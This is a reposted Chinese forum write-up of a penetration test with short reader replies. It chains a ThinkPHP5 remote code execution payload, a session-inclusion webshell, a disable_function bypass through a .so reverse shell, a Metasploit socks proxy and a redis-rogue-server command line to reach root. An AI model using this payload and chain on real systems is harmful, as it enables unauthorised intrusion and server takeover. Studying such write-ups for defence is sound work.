记一次渗透测试提权
2019-12-03 13:32:40 Author: forum.90sec.com(查看原文) 阅读量:170 收藏

#1

目标站点存在thinkphph5远程代码执行漏洞,

image

php7.2,linux,disable_function限制很死不能执行系统命令,某里云。通过设置sessions写马

image

再蚁剑包含连之成功拿到shell,

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=xxx
image

bypass disable_function执行命令的时候发现网站目录都不可写,用以前写得一个脚本蚁剑执行php脚本成功反弹回来,原理就是把so文件写到tmp下面包含执行反弹。

image
image

image

Msf上线,www用户,不过翻配置文件得时候发现了这个

image

image

看到有redis用户以为无望,然而

image

Root?开撸

因为不能外连,Msf开启socks4代理

use auxiliary/server/socks4a

这里我用得https://github.com/Dliv3/redis-rogue-server redis提权工具

套上代理连接

python3 11.py --rhost 1.1.1.1 --rport 6379 --lhost 0.0.0.0 --lport 5451 --passwd  password

因为redis密码含有特殊字符直接在命令行输会连接失败,所以我自己在源码写死密码连接之,成功拿到root权限:

image

多翻翻配置文件说不定会有意想不到惊喜

#2

师傅 session包含那块儿是怎么知道session路径的呢

#3

查看phpinfo中有session路径

#4

#5

session是怎么写入的 不应该要两个参数么

#6

phpinfo里面有session.save_path

#7

think\Session::set

#8

老哥感兴趣可以交流交流


文章来源: https://forum.90sec.com/t/topic/617/7
如有侵权请联系:admin#unsafe.sh